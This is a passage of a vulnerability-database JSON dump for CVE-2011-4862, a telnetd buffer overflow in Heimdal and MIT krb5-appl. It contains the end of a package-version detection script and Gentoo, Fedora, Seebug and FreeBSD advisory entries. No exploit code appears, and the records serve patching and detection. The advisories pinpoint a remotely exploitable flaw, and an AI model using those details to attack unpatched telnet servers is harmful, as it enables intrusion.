}\n\n if ((res = isrpmvuln(pkg:\"heimdal-server\", rpm:\"heimdal-server~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-telnet\", rpm:\"heimdal-telnet~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-telnetd\", rpm:\"heimdal-telnetd~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal-workstation\", rpm:\"heimdal-workstation~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"netkit-telnet\", rpm:\"netkit-telnet~0.17~4.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"netkit-telnet-server\", rpm:\"netkit-telnet-server~0.17~4.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"heimdal\", rpm:\"heimdal~1.2~4.2mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0~0.4mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-clients\", rpm:\"krb5-appl-clients~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl-servers\", rpm:\"krb5-appl-servers~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0~4.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "edition": 1, "description": "### Background\n\nHeimdal is a free implementation of Kerberos 5.\n\n### Description\n\nA boundary error in the \"encrypt_keyid()\" function in appl/telnet/libtelnet/encrypt.c of the telnet daemon and client could cause a buffer overflow. \n\n### Impact\n\nAn unauthenticated remote attacker may be able to execute arbitrary code with the privileges of the user running the telnet daemon or client, or cause Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Heimdal users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-crypt/heimdal-1.5.1-r1\"", "modified": "2012-02-22T00:00:00", "published": "2012-02-22T00:00:00", "id": "GLSA-201202-05", "href": "https://security.gentoo.org/glsa/201202-05", "type": "gentoo", "title": "Heimdal: Arbitrary code execution", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "This package contains Kerberos-aware versions of the telnet, ftp, rcp, rsh, and rlogin clients and servers. While these have been replaced by tools such as OpenSSH in most environments, they remain in use in others. ", "modified": "2012-01-05T21:03:02", "published": "2012-01-05T21:03:02", "id": "FEDORA:836D520F9D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: krb5-appl-1.0.2-2.fc16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1526", "CVE-2011-4862"], "description": "This package contains Kerberos-aware versions of the telnet, ftp, rcp, rsh, and rlogin clients and servers. While these have been replaced by tools such as OpenSSH in most environments, they remain in use in others. ", "modified": "2012-01-05T20:57:26", "published": "2012-01-05T20:57:26", "id": "FEDORA:684542130B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: krb5-appl-1.0.1-8.fc15", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:56:20", "description": "Bugtraq ID: 51182\r\nCVE ID\uff1aCVE-2011-4862\r\n\r\nFreeBSD\u662f\u4e00\u6b3e\u57fa\u4e8eBSD\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\nFreeBSD Telnet\u534f\u8bae\u6709\u4e00\u4e2a\u5bf9\u6570\u636e\u6d41\u8fdb\u884c\u52a0\u5bc6\u7684\u673a\u5236(\u4f46\u5176\u52a0\u5bc6\u6027\u4e0d\u5f3a\uff0c\u4e0d\u80fd\u5728\u4efb\u4f55\u5173\u952e\u6027\u5b89\u5168\u5e94\u7528\u4e0a\u4f7f\u7528)\r\n\r\n\u5f53\u901a\u8fc7TELNET\u534f\u8bae\u63d0\u4f9b\u52a0\u5bc6\u5bc6\u94a5\u65f6\uff0c\u5728\u62f7\u8d1d\u5bc6\u94a5\u5230\u56fa\u5b9a\u7f13\u51b2\u533a\u65f6\u6ca1\u6709\u5bf9\u5176\u957f\u5ea6\u8fdb\u884c\u6821\u9a8c\uff0c\u53ef\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\u80fd\u8fde\u63a5telnetd\u5b88\u62a4\u7a0b\u5e8f\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u4ee5\u5b88\u62a4\u8fdb\u7a0b\u4e0a\u4e0b\u6587\u6267\u884c\u4efb\u610f\u4ee3\u7801\n0\nFreebsd 9.0-STABLE\r\nFreebsd 9.0-RELEASE\r\nFreebsd 9.0-RC3\r\nFreebsd 9.0-RC1\r\nFreebsd 8.2-STABLE\r\nFreebsd 8.2-STABLE\r\nFreebsd 8.2-RELEASE-p2\r\nFreebsd 8.2-RELEASE-p1\r\nFreebsd 8.2 - RELEASE -p3\r\nFreebsd 8.2\r\nFreebsd 8.1-RELEASE-p5\r\nFreebsd 8.1-RELEASE-p4\r\nFreeBSD 8.1-RELEASE\r\nFreeBSD 8.1-PRERELEASE\r\nFreebsd 8.1\r\nFreebsd 7.4-STABLE\r\nFreebsd 7.4-RELEASE-p2\r\nFreebsd 7.4 -RELEASE-p3\r\nFreebsd 7.4\r\nFreeBSD 7.3-STABLE\r\nFreebsd 7.3-RELEASE-p6\r\nFreeBSD 7.3-RELEASE-p1\r\nFreebsd 7.3 - RELEASE - p7\r\nFreebsd 7.3\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n----\r\nfreebsd\r\n\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u4f9b\u5e94\u5546\u63d0\u4f9b\u7684\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\uff1a\r\nhttp://security.freebsd.org/advisories/FreeBSD-SA-11:08.telnetd.asc", "published": "2011-12-26T00:00:00", "type": "seebug", "title": "FreeBSD 'telnetd'\u5b88\u62a4\u8fdb\u7a0b\u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2011-12-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26112", "id": "SSV:26112", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:54", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "\nThe MIT Kerberos Team reports:\n\nWhen an encryption key is supplied via the TELNET protocol,\n\t its length is not validated before the key is copied into a\n\t fixed-size buffer. Also see MITKRB5-SA-2011-008.\n\n", "edition": 4, "modified": "2012-01-29T00:00:00", "published": "2011-12-23T00:00:00", "id": "4DDC78DC-300A-11E1-A2AA-0016CE01E285", "href": "https://vuxml.freebsd.org/freebsd/4ddc78dc-300a-11e1-a2aa-0016ce01e285.html", "title": "krb5-appl -- telnetd code execution vulnerability", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
